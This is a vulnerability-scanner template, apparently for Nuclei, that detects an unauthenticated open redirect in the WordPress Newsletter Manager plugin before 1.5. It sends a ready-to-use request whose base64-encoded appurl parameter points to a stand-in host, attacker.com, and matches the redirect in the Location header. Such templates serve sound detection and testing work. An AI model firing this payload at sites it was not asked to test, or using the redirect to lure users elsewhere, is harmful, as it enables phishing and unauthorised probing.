id: newsletter-manager-open-redirect

info:
  name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect
  author: akincibor
  severity: low
  description: |
    The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue.
  reference:
    - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
  metadata:
    verified: true
  tags: wp-plugin,redirect,wordpress,wp,unauth

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2F0dGFja2VyLmNvbQ=="

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1